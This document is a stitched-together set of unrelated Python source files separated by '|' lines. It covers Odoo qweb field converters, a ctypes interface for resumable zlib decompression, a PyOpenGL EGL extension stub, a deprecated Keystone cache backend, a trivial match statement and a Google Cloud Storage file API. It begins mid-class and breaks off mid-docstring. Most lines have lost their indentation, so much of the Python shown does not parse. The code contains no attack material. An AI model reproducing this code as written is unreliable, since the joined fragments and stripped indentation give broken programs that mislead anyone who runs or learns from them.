def from_html(self, model, field, element):
lang = self.user_lang()
value = element.find('span').text.strip()
return float(value.replace(lang.thousands_sep, '')
.replace(lang.decimal_point, '.'))
class Duration(models.AbstractModel):
_name = 'ir.qweb.field.duration'
_inherit = 'ir.qweb.field.duration'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(Duration, self).attributes(record, field_name, options, values)
attrs['data-oe-original'] = record[field_name]
return attrs
@api.model
def from_html(self, model, field, element):
value = element.text_content().strip()
# non-localized value
return float(value)
class RelativeDatetime(models.AbstractModel):
_name = 'ir.qweb.field.relative'
_inherit = 'ir.qweb.field.relative'
# get formatting from ir.qweb.field.relative but edition/save from datetime
class QwebView(models.AbstractModel):
_name = 'ir.qweb.field.qweb'
_inherit = 'ir.qweb.field.qweb'
def html_to_text(element):
""" Converts HTML content with HTML-specified line breaks (br, p, div, ...)
in roughly equivalent textual content.
Used to replace and fixup the roundtripping of text and m2o: when using
libxml 2.8.0 (but not 2.9.1) and parsing HTML with lxml.html.fromstring
whitespace text nodes (text nodes composed *solely* of whitespace) are
stripped out with no recourse, and fundamentally relying on newlines
being in the text (e.g. inserted during user edition) is probably poor form
anyway.
-> this utility function collapses whitespace sequences and replaces
nodes by roughly corresponding linebreaks
* p are pre-and post-fixed by 2 newlines
* br are replaced by a single newline
* block-level elements not already mentioned are pre- and post-fixed by
a single newline
    ought to be somewhat similar (but much less high-tech) to aaronsw's html2text.
the latter produces full-blown markdown, our text -> html converter only
replaces newlines by <br> elements at this point so we're reverting that,
and a few more newline-ish elements in case the user tried to add
newlines/paragraphs into the text field
:param element: lxml.html content
:returns: corresponding pure-text output
"""
# output is a list of str | int. Integers are padding requests (in minimum
# number of newlines). When multiple padding requests, fold them into the
# biggest one
output = []
_wrap(element, output)
# remove any leading or tailing whitespace, replace sequences of
# (whitespace)\n(whitespace) by a single newline, where (whitespace) is a
# non-newline whitespace in this case
return re.sub(
r'[ \t\r\f]*\n[ \t\r\f]*',
'\n',
''.join(_realize_padding(output)).strip())
_PADDED_BLOCK = set('p h1 h2 h3 h4 h5 h6'.split())
_MISC_BLOCK = set((
'address article aside audio blockquote canvas dd dl div figcaption figure'
' footer form header hgroup hr ol output pre section tfoot ul video'
).split())
def _collapse_whitespace(text):
""" Collapses sequences of whitespace characters in ``text`` to a single
space
"""
    return re.sub(r'\s+', ' ', text)
def _realize_padding(it):
""" Fold and convert padding requests: integers in the output sequence are
requests for at least n newlines of padding. Runs thereof can be collapsed
into the largest requests and converted to newlines.
"""
padding = 0
for item in it:
if isinstance(item, int):
padding = max(padding, item)
continue
if padding:
yield '\n' * padding
padding = 0
yield item
# leftover padding irrelevant as the output will be stripped
def _wrap(element, output, wrapper=u''):
""" Recursively extracts text from ``element`` (via _element_to_text), and
wraps it all in ``wrapper``. Extracted text is added to ``output``
:type wrapper: basestring | int
"""
output.append(wrapper)
if element.text:
output.append(_collapse_whitespace(element.text))
for child in element:
_element_to_text(child, output)
output.append(wrapper)
def _element_to_text(e, output):
if e.tag == 'br':
output.append(u'\n')
elif e.tag in _PADDED_BLOCK:
_wrap(e, output, 2)
elif e.tag in _MISC_BLOCK:
_wrap(e, output, 1)
else:
# inline
_wrap(e, output)
if e.tail:
output.append(_collapse_whitespace(e.tail))
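# A minimal sketch, not part of the original module: exercising html_to_text
# above with lxml's parser (`html` is imported at the top of this file).
if __name__ == '__main__':
    fragment = html.fromstring(u'<div><p>Hello</p>world<br/>again</div>')
    # prints u'Hello\n\nworld\nagain'
    print(html_to_text(fragment))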
|
"""Resumable decompression
A ctypes interface to zlib decompress/inflate functions that mimics
zlib.decompressobj interface but also supports getting and setting the
z_stream state to suspend/serialize it and then resume the decompression
at a later time.
"""
import cPickle
import ctypes
import zlib
if zlib.ZLIB_VERSION != '1.2.3.3' and zlib.ZLIB_VERSION != '1.2.3.4':
raise zlib.error("zlib version not supported: %s" % (zlib.ZLIB_VERSION))
if zlib.ZLIB_VERSION == '1.2.3.3':
# from inftrees.h
ENOUGH = 2048
elif zlib.ZLIB_VERSION == '1.2.3.4':
ENOUGH_LENS = 852
ENOUGH_DISTS = 592
ENOUGH = ENOUGH_LENS + ENOUGH_DISTS
Bytefp = ctypes.POINTER(ctypes.c_ubyte)
class GZHeader(ctypes.Structure):
"""gz_header_s structure."""
_fields_ = [
('text', ctypes.c_int),
('time', ctypes.c_ulong),
('xflags', ctypes.c_int),
('os', ctypes.c_int),
('extra', Bytefp),
('extra_len', ctypes.c_uint),
('extra_max', ctypes.c_uint),
('name', Bytefp),
('name_max', ctypes.c_uint),
('comment', Bytefp),
('comm_max', ctypes.c_uint),
('hcrc', ctypes.c_int),
('done', ctypes.c_int),
]
class Code(ctypes.Structure):
"""code structure."""
_fields_ = [
('op', ctypes.c_ubyte),
('bits', ctypes.c_ubyte),
('val', ctypes.c_ushort),
]
if zlib.ZLIB_VERSION == '1.2.3.4':
extra_fields = [
('sane', ctypes.c_int),
('back', ctypes.c_int),
('was', ctypes.c_uint),
]
extra_attr = tuple([i[0] for i in extra_fields])
else:
extra_fields = []
extra_attr = ()
class InflateState(ctypes.Structure):
"""inflate_state structure."""
_fields_ = [
('mode', ctypes.c_int),
('last', ctypes.c_int),
('wrap', ctypes.c_int),
('havedict', ctypes.c_int),
('flags', ctypes.c_int),
('dmax', ctypes.c_uint),
('check', ctypes.c_ulong),
('total', ctypes.c_ulong),
('head', ctypes.POINTER(GZHeader)),
('wbits', ctypes.c_uint),
('wsize', ctypes.c_uint),
('whave', ctypes.c_uint),
('write', ctypes.c_uint),
('window', ctypes.POINTER(ctypes.c_ubyte)),
('hold', ctypes.c_ulong),
('bits', ctypes.c_uint),
('length', ctypes.c_uint),
('offset', ctypes.c_uint),
('extra', ctypes.c_uint),
('lencode', ctypes.POINTER(Code)),
('distcode', ctypes.POINTER(Code)),
('lenbits', ctypes.c_uint),
('distbits', ctypes.c_uint),
('ncode', ctypes.c_uint),
('nlen', ctypes.c_uint),
('ndist', ctypes.c_uint),
('have', ctypes.c_uint),
('next', ctypes.POINTER(Code)),
('lens', ctypes.c_ushort * 320),
('work', ctypes.c_ushort * 288),
('codes', Code * ENOUGH)
] + extra_fields
    simple_attr = ('last', 'wrap', 'havedict', 'flags', 'dmax',
                   'check', 'total', 'wbits', 'wsize', 'whave', 'write',
                   'hold', 'bits', 'length', 'offset',
                   'extra', 'lenbits', 'distbits', 'ncode', 'nlen',
                   'ndist', 'have', 'mode') + extra_attr
def get_state(self):
"""Get the state of inflate_state struct."""
        # head will always be a NULL pointer, as we use raw inflate/deflate
state = {}
# first get the pointers offsets
#lencode = ctypes.string_at(self.lencode, ctypes.sizeof(Code))
lencode_addr = ctypes.addressof(self.lencode.contents)
codes_start = ctypes.addressof(self.codes)
lencode = lencode_addr - codes_start
#distcode = ctypes.string_at(self.distcode, ctypes.sizeof(Code))
distcode = ctypes.addressof(self.distcode.contents) - codes_start
#next = ctypes.string_at(self.next, ctypes.sizeof(Code))
next = ctypes.addressof(self.next.contents) - codes_start
# now get the raw memory data
codes = ctypes.string_at(ctypes.pointer(self.codes),
ctypes.sizeof(self.codes))
lens = ctypes.string_at(ctypes.pointer(self.lens),
ctypes.sizeof(self.lens))
work = ctypes.string_at(ctypes.pointer(self.work),
ctypes.sizeof(self.work))
if self.window:
window = ctypes.string_at(self.window, self.wsize)
else:
window = None
if self.head:
raise ValueError("gzip resume isn't supported.")
state = {'lencode': lencode, 'distcode': distcode, 'codes': codes,
'window': window, 'lens': lens, 'work': work, 'next': next,
'head': None}
# now add the basic type attributes to the state dict
for attr_name in self.simple_attr:
state[attr_name] = getattr(self, attr_name)
return state
def set_state(self, old_state, zalloc):
"""Set the state of this inflate state.
@param old_state: the old state dict.
@param zalloc: the zalloc function (in case we need to allocate space
for the window).
"""
if old_state['head']:
raise ValueError("gzip resume isn't supported.")
# set the basic type attributes from the old state dict
for attr_name in self.simple_attr:
setattr(self, attr_name, old_state[attr_name])
# set the data from the array attributes.
ctypes.memmove(ctypes.pointer(self.codes),
ctypes.c_char_p(old_state['codes']),
ctypes.sizeof(self.codes))
ctypes.memmove(ctypes.pointer(self.lens),
ctypes.c_char_p(old_state['lens']),
ctypes.sizeof(self.lens))
ctypes.memmove(ctypes.pointer(self.work),
ctypes.c_char_p(old_state['work']),
ctypes.sizeof(self.work))
# fix the Code pointers
codes_start = ctypes.addressof(self.codes)
self.lencode = ctypes.pointer(
Code.from_address(codes_start + old_state['lencode']))
self.distcode = ctypes.pointer(
Code.from_address(codes_start + old_state['distcode']))
self.next = ctypes.pointer(
Code.from_address(codes_start + old_state['next']))
# set the window
if old_state['window']:
if not self.window:
# we don't have the window mem allocated
addr = zalloc(ctypes.c_uint(1 << self.wbits),
ctypes.sizeof(ctypes.c_ubyte))
self.window = ctypes.cast(addr, ctypes.POINTER(ctypes.c_ubyte))
# set the contents of the window, we don't care about the size as
# in our use case it's always 1<<zlib.MAX_WBITS.
ctypes.memmove(self.window, ctypes.c_char_p(old_state['window']),
1 << self.wbits)
class ResumableZStream(ctypes.Structure):
"""z_stream structure."""
_fields_ = [
("next_in", ctypes.POINTER(ctypes.c_ubyte)),
("avail_in", ctypes.c_uint),
("total_in", ctypes.c_ulong),
("next_out", ctypes.POINTER(ctypes.c_ubyte)),
("avail_out", ctypes.c_uint),
("total_out", ctypes.c_ulong),
("msg", ctypes.c_char_p),
("state", ctypes.POINTER(InflateState)),
("zalloc", ctypes.c_void_p),
("zfree", ctypes.c_void_p),
("opaque", ctypes.c_void_p),
("data_type", ctypes.c_int),
("adler", ctypes.c_ulong),
("reserved", ctypes.c_ulong),
]
def get_state(self):
"""Returns the context as a string."""
# sanity checks
if self.next_in and self.avail_in > 0:
raise ValueError("There are pending bytes to process in next_in")
if self.msg:
raise ValueError("Can't serialize a stream in a error state.")
if self.state:
inflate_state = self.state.contents.get_state()
else:
inflate_state = {}
state = {'total_in': self.total_in,
'total_out': self.total_out,
'avail_in': self.avail_in,
'avail_out': self.avail_out,
'data_type': self.data_type,
'adler': self.adler,
'reserved': self.reserved,
'msg': self.msg,
'state': inflate_state,
'zlib_version': zlib.ZLIB_VERSION}
return cPickle.dumps(state)
def set_state(self, old_state):
"""Set the context with a string of data."""
old_state = cPickle.loads(old_state)
# first check the version
if old_state['zlib_version'] != zlib.ZLIB_VERSION:
raise VersionError("zlib_version: %s, not supported (%s)" %
(old_state['zlib_version'], zlib.ZLIB_VERSION))
# set the data
self.total_in = old_state['total_in']
self.total_out = old_state['total_out']
self.avail_in = old_state['avail_in']
self.avail_out = old_state['avail_out']
self.data_type = old_state['data_type']
self.adler = old_state['adler']
self.reserved = old_state['reserved']
inflate_state = old_state['state']
# build the zalloc function, see zutil.c
zcalloc = ctypes.CFUNCTYPE(ctypes.c_void_p)(self.zalloc)
zalloc = lambda items, size: zcalloc(self.opaque, items, size)
if self.state and inflate_state:
# set the inflate_state state
self.state.contents.set_state(inflate_state, zalloc)
class PyTypeObject(ctypes.Structure):
"""PyTypeObject structure."""
_fields_ = [
("ob_refcnt", ctypes.c_size_t),
("ob_type", ctypes.c_void_p),
("ob_size", ctypes.c_size_t),
("tp_name", ctypes.c_char_p)
]
class PyObject(ctypes.Structure):
"""PyObject structure."""
_fields_ = [
("ob_refcnt", ctypes.c_size_t),
("ob_type", ctypes.POINTER(PyTypeObject))
]
PyObjectPtr = ctypes.POINTER(PyObject)
class CompObject(PyObject):
"""zlibmodule.c CompObject structure."""
_fields_ = [
('zst', ResumableZStream),
('unused_data', PyObjectPtr),
('unconsumed_tail', PyObjectPtr),
('is_initialised', ctypes.c_int)
]
class Decompress(object):
"""A zlib.Decompress wrapper that supports get/setting the state."""
def __init__(self, decompress_obj=None):
if decompress_obj is None:
decompress_obj = zlib.decompressobj()
self._do = decompress_obj
# get the C Decompress object
self._c_do = ctypes.cast(ctypes.c_void_p(id(self._do)),
ctypes.POINTER(CompObject)).contents
@property
def unconsumed_tail(self):
"""The uncosumed tail."""
return self._do.unconsumed_tail
@property
def unused_data(self):
"""The unused_data."""
return self._do.unused_data
def decompress(self, *args, **kwargs):
"""See zlib.decompressobj().decompress method."""
return self._do.decompress(*args, **kwargs)
def flush(self, *args, **kwargs):
"""See zlib.decompressobj().flush method."""
return self._do.flush(*args, **kwargs)
def copy(self):
"""See zlib.decompressobj().copy method."""
return Decompress(self._do.copy())
def set_state(self, z_stream_state):
"""Set the specified z_stream state."""
self._c_do.zst.set_state(z_stream_state)
def get_state(self):
"""Get the current z_stream state."""
return self._c_do.zst.get_state()
def decompressobj(z_stream_state=None, wbits=zlib.MAX_WBITS):
"""Returns a custom Decompress object instance."""
do = Decompress(decompress_obj=zlib.decompressobj(wbits))
if z_stream_state is not None:
do.set_state(z_stream_state)
return do
class VersionError(Exception):
"""Exception used for version mismatch in z_stream.set_state."""
|
'''OpenGL extension KHR.surfaceless_context
This module customises the behaviour of the
OpenGL.raw.EGL.KHR.surfaceless_context to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/KHR/surfaceless_context.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.EGL import _types, _glgets
from OpenGL.raw.EGL.KHR.surfaceless_context import *
from OpenGL.raw.EGL.KHR.surfaceless_context import _EXTENSION_NAME
def glInitSurfacelessContextKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
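# Hedged usage sketch, not part of the module: guard surfaceless EGL setup on
# extension availability (display and context creation are assumed elsewhere).
#   if glInitSurfacelessContextKHR():
#       # binding a context with EGL_NO_SURFACE for draw/read is now legal
#       pass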
|
"""This module is deprecated."""
from oslo_cache.backends import memcache_pool
from oslo_log import versionutils
@versionutils.deprecated(
versionutils.deprecated.MITAKA,
what='keystone.cache.memcache_pool backend',
in_favor_of='oslo_cache.memcache_pool backend',
remove_in=+1)
class PooledMemcachedBackend(memcache_pool.PooledMemcachedBackend):
pass
|
match x:
    case 1:
        pass
    case 2:
        pass
    case 3:
        pass
    case _:
        pass
|
"""File Interface for Google Cloud Storage."""
from __future__ import with_statement
__all__ = ['copy2',
'delete',
'listbucket',
'open',
'stat',
'compose',
'get_location',
'get_storage_class',
]
import logging
import StringIO
import urllib
import os
import itertools
import types
import xml.etree.cElementTree as ET
from . import api_utils
from . import common
from . import errors
from . import storage_api
def open(filename,
mode='r',
content_type=None,
options=None,
read_buffer_size=storage_api.ReadBuffer.DEFAULT_BUFFER_SIZE,
retry_params=None,
_account_id=None,
offset=0):
"""Opens a Google Cloud Storage file and returns it as a File-like object.
Args:
filename: A Google Cloud Storage filename of form '/bucket/filename'.
mode: 'r' for reading mode. 'w' for writing mode.
      In reading mode, the file must exist. In writing mode, a file will
      be created or overwritten.
content_type: The MIME type of the file. str. Only valid in writing mode.
options: A str->basestring dict to specify additional headers to pass to
GCS e.g. {'x-goog-acl': 'private', 'x-goog-meta-foo': 'foo'}.
Supported options are x-goog-acl, x-goog-meta-, cache-control,
content-disposition, and content-encoding.
Only valid in writing mode.
See https://developers.google.com/storage/docs/reference-headers
for details.
read_buffer_size: The buffer size for read. Read keeps a buffer
and prefetches another one. To minimize blocking for large files,
always read by buffer size. To minimize number of RPC requests for
small files, set a large buffer size. Max is 30MB.
retry_params: An instance of api_utils.RetryParams for subsequent calls
to GCS from this file handle. If None, the default one is used.
_account_id: Internal-use only.
offset: Number of bytes to skip at the start of the file. If None, 0 is
used.
Returns:
A reading or writing buffer that supports File-like interface. Buffer
must be closed after operations are done.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if an object that's expected to exist doesn't.
ValueError: invalid open mode or if content_type or options are specified
in reading mode.
"""
common.validate_file_path(filename)
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
filename = api_utils._quote_filename(filename)
if mode == 'w':
common.validate_options(options)
return storage_api.StreamingBuffer(api, filename, content_type, options)
elif mode == 'r':
if content_type or options:
raise ValueError('Options and content_type can only be specified '
'for writing mode.')
return storage_api.ReadBuffer(api,
filename,
buffer_size=read_buffer_size,
offset=offset)
else:
raise ValueError('Invalid mode %s.' % mode)
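# Hedged usage sketch, not part of the API: write then read a file through
# the open() wrapper above (bucket and object names are assumptions).
#   with open('/my_bucket/demo.txt', 'w', content_type='text/plain') as f:
#     f.write('hello')
#   with open('/my_bucket/demo.txt', 'r') as f:
#     print f.read()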
def delete(filename, retry_params=None, _account_id=None):
"""Delete a Google Cloud Storage file.
Args:
filename: A Google Cloud Storage filename of form '/bucket/filename'.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Raises:
errors.NotFoundError: if the file doesn't exist prior to deletion.
"""
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
common.validate_file_path(filename)
filename = api_utils._quote_filename(filename)
status, resp_headers, content = api.delete_object(filename)
errors.check_status(status, [204], filename, resp_headers=resp_headers,
body=content)
def get_location(bucket, retry_params=None, _account_id=None):
"""Returns the location for the given bucket.
https://cloud.google.com/storage/docs/bucket-locations
Args:
bucket: A Google Cloud Storage bucket of form '/bucket'.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Returns:
The location as a string.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if the bucket does not exist.
"""
return _get_bucket_attribute(bucket,
'location',
'LocationConstraint',
retry_params=retry_params,
_account_id=_account_id)
def get_storage_class(bucket, retry_params=None, _account_id=None):
"""Returns the storage class for the given bucket.
https://cloud.google.com/storage/docs/storage-classes
Args:
bucket: A Google Cloud Storage bucket of form '/bucket'.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Returns:
The storage class as a string.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if the bucket does not exist.
"""
return _get_bucket_attribute(bucket,
'storageClass',
'StorageClass',
retry_params=retry_params,
_account_id=_account_id)
def _get_bucket_attribute(bucket,
query_param,
xml_response_tag,
retry_params=None,
_account_id=None):
"""Helper method to request a bucket parameter and parse the response.
Args:
bucket: A Google Cloud Storage bucket of form '/bucket'.
query_param: The query parameter to include in the get bucket request.
xml_response_tag: The expected tag in the xml response.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Returns:
The xml value as a string. None if the returned xml does not match expected
format.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if the bucket does not exist.
"""
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
common.validate_bucket_path(bucket)
status, headers, content = api.get_bucket('%s?%s' % (bucket, query_param))
errors.check_status(status, [200], bucket, resp_headers=headers, body=content)
root = ET.fromstring(content)
if root.tag == xml_response_tag and root.text:
return root.text
return None
def stat(filename, retry_params=None, _account_id=None):
"""Get GCSFileStat of a Google Cloud storage file.
Args:
filename: A Google Cloud Storage filename of form '/bucket/filename'.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Returns:
a GCSFileStat object containing info about this file.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if an object that's expected to exist doesn't.
"""
common.validate_file_path(filename)
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
status, headers, content = api.head_object(
api_utils._quote_filename(filename))
errors.check_status(status, [200], filename, resp_headers=headers,
body=content)
file_stat = common.GCSFileStat(
filename=filename,
st_size=common.get_stored_content_length(headers),
st_ctime=common.http_time_to_posix(headers.get('last-modified')),
etag=headers.get('etag'),
content_type=headers.get('content-type'),
metadata=common.get_metadata(headers))
return file_stat
def copy2(src, dst, metadata=None, retry_params=None):
"""Copy the file content from src to dst.
Args:
src: /bucket/filename
dst: /bucket/filename
metadata: a dict of metadata for this copy. If None, old metadata is copied.
For example, {'x-goog-meta-foo': 'bar'}.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
Raises:
errors.AuthorizationError: if authorization failed.
errors.NotFoundError: if an object that's expected to exist doesn't.
"""
common.validate_file_path(src)
common.validate_file_path(dst)
if metadata is None:
metadata = {}
copy_meta = 'COPY'
else:
copy_meta = 'REPLACE'
metadata.update({'x-goog-copy-source': src,
'x-goog-metadata-directive': copy_meta})
api = storage_api._get_storage_api(retry_params=retry_params)
status, resp_headers, content = api.put_object(
api_utils._quote_filename(dst), headers=metadata)
errors.check_status(status, [200], src, metadata, resp_headers, body=content)
def listbucket(path_prefix, marker=None, prefix=None, max_keys=None,
delimiter=None, retry_params=None, _account_id=None):
"""Returns a GCSFileStat iterator over a bucket.
Optional arguments can limit the result to a subset of files under bucket.
This function has two modes:
1. List bucket mode: Lists all files in the bucket without any concept of
hierarchy. GCS doesn't have real directory hierarchies.
2. Directory emulation mode: If you specify the 'delimiter' argument,
it is used as a path separator to emulate a hierarchy of directories.
In this mode, the "path_prefix" argument should end in the delimiter
specified (thus designates a logical directory). The logical directory's
contents, both files and subdirectories, are listed. The names of
subdirectories returned will end with the delimiter. So listbucket
can be called with the subdirectory name to list the subdirectory's
contents.
Args:
path_prefix: A Google Cloud Storage path of format "/bucket" or
"/bucket/prefix". Only objects whose fullpath starts with the
path_prefix will be returned.
marker: Another path prefix. Only objects whose fullpath starts
lexicographically after marker will be returned (exclusive).
prefix: Deprecated. Use path_prefix.
max_keys: The limit on the number of objects to return. int.
For best performance, specify max_keys only if you know how many objects
you want. Otherwise, this method requests large batches and handles
pagination for you.
delimiter: Use to turn on directory mode. str of one or multiple chars
that your bucket uses as its directory separator.
retry_params: An api_utils.RetryParams for this call to GCS. If None,
the default one is used.
_account_id: Internal-use only.
Examples:
For files "/bucket/a",
"/bucket/bar/1"
"/bucket/foo",
"/bucket/foo/1", "/bucket/foo/2/1", "/bucket/foo/3/1",
Regular mode:
listbucket("/bucket/f", marker="/bucket/foo/1")
will match "/bucket/foo/2/1", "/bucket/foo/3/1".
Directory mode:
listbucket("/bucket/", delimiter="/")
will match "/bucket/a, "/bucket/bar/" "/bucket/foo", "/bucket/foo/".
listbucket("/bucket/foo/", delimiter="/")
will match "/bucket/foo/1", "/bucket/foo/2/", "/bucket/foo/3/"
Returns:
Regular mode:
A GCSFileStat iterator over matched files ordered by filename.
The iterator returns GCSFileStat objects. filename, etag, st_size,
st_ctime, and is_dir are set.
Directory emulation mode:
A GCSFileStat iterator over matched files and directories ordered by
name. The iterator returns GCSFileStat objects. For directories,
only the filename and is_dir fields are set.
The last name yielded can be used as next call's marker.
"""
if prefix:
common.validate_bucket_path(path_prefix)
bucket = path_prefix
else:
bucket, prefix = common._process_path_prefix(path_prefix)
if marker and marker.startswith(bucket):
marker = marker[len(bucket) + 1:]
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
options = {}
if marker:
options['marker'] = marker
if max_keys:
options['max-keys'] = max_keys
if prefix:
options['prefix'] = prefix
if delimiter:
options['delimiter'] = delimiter
return _Bucket(api, bucket, options)
def compose(list_of_files, destination_file, files_metadata=None,
content_type=None, retry_params=None, _account_id=None):
"""Runs the GCS Compose on the given files.
Merges between 2 and 32 files into one file. Composite files may even
be built from other existing composites, provided that the total
component count does not exceed 1024. See here for details:
https://cloud.google.com/storage/docs/composite-objects
Args:
list_of_files: List of file name strings with no leading slashes or bucket.
destination_file: Path to the output file. Must have the bucket in the path.
files_metadata: Optional, file metadata, order must match list_of_files,
see link for available options:
https://cloud.google.com/storage/docs/composite-objects#_Xml
content_type: Optional, used to specify content-header of the output file.
    retry_params: Optional, an api_utils.RetryParams for this call to GCS.
      If None, the default one is used.
_account_id: Internal-use only.
Raises:
ValueError: If the number of files is outside the range of 2-32.
"""
api = storage_api._get_storage_api(retry_params=retry_params,
account_id=_account_id)
  if os.getenv('SERVER_SOFTWARE', '').startswith('Dev'):
def _temp_func(file_list, destination_file, content_type):
bucket = '/' + destination_file.split('/')[1] + '/'
with open(destination_file, 'w', content_type=content_type) as gcs_merge:
for source_file in file_list:
with open(bucket + source_file['Name'], 'r') as gcs_source:
gcs_merge.write(gcs_source.read())
compose_object = _temp_func
else:
compose_object = api.compose_object
file_list, _ = _validate_compose_list(destination_file,
list_of_files,
files_metadata, 32)
compose_object(file_list, destination_file, content_type)
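# Hedged usage sketch, not part of the API: merge two objects into one. The
# names are assumptions; note that source names carry no leading slash or
# bucket, while the destination does.
#   compose(['part-1', 'part-2'], '/my_bucket/merged',
#           content_type='text/plain')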
def _file_exists(destination):
"""Checks if a file exists.
  Tries to open the file; returns True if that succeeds, False otherwise.
Args:
destination: Full path to the file (ie. /bucket/object) with leading slash.
Returns:
True if the file is accessible otherwise False.
"""
try:
with open(destination, "r"):
return True
except errors.NotFoundError:
return False
def _validate_compose_list(destination_file, file_list,
files_metadata=None, number_of_files=32):
"""Validates the file_list and merges the file_list, files_metadata.
Args:
    destination_file: Path to the file (ie. /destination_bucket/destination_file).
file_list: List of files to compose, see compose for details.
files_metadata: Meta details for each file in the file_list.
number_of_files: Maximum number of files allowed in the list.
Returns:
A tuple (list_of_files, bucket):
list_of_files: Ready to use dict version of the list.
bucket: bucket name extracted from the file paths.
"""
common.validate_file_path(destination_file)
bucket = destination_file[0:(destination_file.index('/', 1) + 1)]
try:
if isinstance(file_list, types.StringTypes):
raise TypeError
list_len = len(file_list)
except TypeError:
raise TypeError('file_list must be a list')
if list_len > number_of_files:
raise ValueError(
        'Compose attempted to create composite with too many '
        '(%i) components; limit is (%i).' % (list_len, number_of_files))
if list_len <= 0:
raise ValueError('Compose operation requires at'
' least one component; 0 provided.')
if files_metadata is None:
files_metadata = []
elif len(files_metadata) > list_len:
raise ValueError('files_metadata contains more entries(%i)'
' than file_list(%i)'
% (len(files_metadata), list_len))
list_of_files = []
for source_file, meta_data in itertools.izip_longest(file_list,
files_metadata):
if not isinstance(source_file, str):
raise TypeError('Each item of file_list must be a string')
if source_file.startswith('/'):
      logging.warn('Detected a "/" at the start of the file; '
                   'unless the file name contains a "/", it '
                   'may cause files to be misread')
if source_file.startswith(bucket):
      logging.warn('Detected bucket name at the start of the file; '
                   'do not specify the bucket when listing file names. '
                   'This may cause files to be misread')
common.validate_file_path(bucket + source_file)
list_entry = {}
if meta_data is not None:
list_entry.update(meta_data)
list_entry['Name'] = source_file
list_of_files.append(list_entry)
return list_of_files, bucket
class _Bucket(object):
"""A wrapper for a GCS bucket as the return value of listbucket."""
def __init__(self, api, path, options):
"""Initialize.
Args:
api: storage_api instance.
path: bucket path of form '/bucket'.
options: a dict of listbucket options. Please see listbucket doc.
"""
self._init(api, path, options)
def _init(self, api, path, options):
self._api = api
self._path = path
self._options = options.copy()
self._get_bucket_fut = self._api.get_bucket_async(
self._path + '?' + urllib.urlencode(self._options))
self._last_yield = None
self._new_max_keys = self._options.get('max-keys')
def __getstate__(self):
options = self._options
if self._last_yield:
options['marker'] = self._last_yield.filename[len(self._path) + 1:]
if self._new_max_keys is not None:
options['max-keys'] = self._new_max_keys
return {'api': self._api,
'path': self._path,
'options': options}
def __setstate__(self, state):
self._init(state['api'], state['path'], state['options'])
def __iter__(self):
"""Iter over the bucket.
Yields:
GCSFileStat: a GCSFileStat for an object in the bucket.
They are ordered by GCSFileStat.filename.
"""
total = 0
max_keys = self._options.get('max-keys')
while self._get_bucket_fut:
status, resp_headers, content = self._get_bucket_fut.get_result()
errors.check_status(status, [200], self._path, resp_headers=resp_headers,
body=content, extras=self._options)
if self._should_get_another_batch(content):
self._get_bucket_fut = self._api.get_bucket_async(
self._path + '?' + urllib.urlencode(self._options))
else:
self._get_bucket_fut = None
root = ET.fromstring(content)
dirs = self._next_dir_gen(root)
files = self._next_file_gen(root)
next_file = files.next()
next_dir = dirs.next()
while ((max_keys is None or total < max_keys) and
not (next_file is None and next_dir is None)):
total += 1
if next_file is None:
self._last_yield = next_dir
next_dir = dirs.next()
elif next_dir is None:
self._last_yield = next_file
next_file = files.next()
elif next_dir < next_file:
self._last_yield = next_dir
next_dir = dirs.next()
elif next_file < next_dir:
self._last_yield = next_file
next_file = files.next()
else:
logging.error(
'Should never reach. next file is %r. next dir is %r.',
next_file, next_dir)
if self._new_max_keys:
self._new_max_keys -= 1
yield self._last_yield
def _next_file_gen(self, root):
"""Generator for next file element in the document.
Args:
root: root element of the XML tree.
Yields:
GCSFileStat for the next file.
"""
for e in root.getiterator(common._T_CONTENTS):
st_ctime, size, etag, key = None, None, None, None
for child in e.getiterator('*'):
if child.tag == common._T_LAST_MODIFIED:
st_ctime = common.dt_str_to_posix(child.text)
elif child.tag == common._T_ETAG:
etag = child.text
elif child.tag == common._T_SIZE:
size = child.text
elif child.tag == common._T_KEY:
key = child.text
yield common.GCSFileStat(self._path + '/' + key,
size, etag, st_ctime)
e.clear()
yield None
def _next_dir_gen(self, root):
"""Generator for next directory element in the document.
Args:
root: root element in the XML tree.
Yields:
GCSFileStat for the next directory.
"""
for e in root.getiterator(common._T_COMMON_PREFIXES):
yield common.GCSFileStat(
self._path + '/' + e.find(common._T_PREFIX).text,
st_size=None, etag=None, st_ctime=None, is_dir=True)
e.clear()
yield None
def _should_get_another_batch(self, content):
"""Whether to issue another GET bucket call.
Args:
content: response XML.
Returns:
True if should, also update self._options for the next request.
False otherwise.
"""
if ('max-keys' in self._options and
self._options['max-keys'] <= common._MAX_GET_BUCKET_RESULT):
return False
elements = self._find_elements(
content, set([common._T_IS_TRUNCATED,
common._T_NEXT_MARKER]))
if elements.get(common._T_IS_TRUNCATED, 'false').lower() != 'true':
return False
next_marker = elements.get(common._T_NEXT_MARKER)
if next_marker is None:
self._options.pop('marker', None)
return False
self._options['marker'] = next_marker
return True
def _find_elements(self, result, elements):
"""Find interesting elements from XML.
    This function tries to look only for the specified elements
    without parsing the entire XML. This works best when the specified
    elements are located near the beginning of the document.
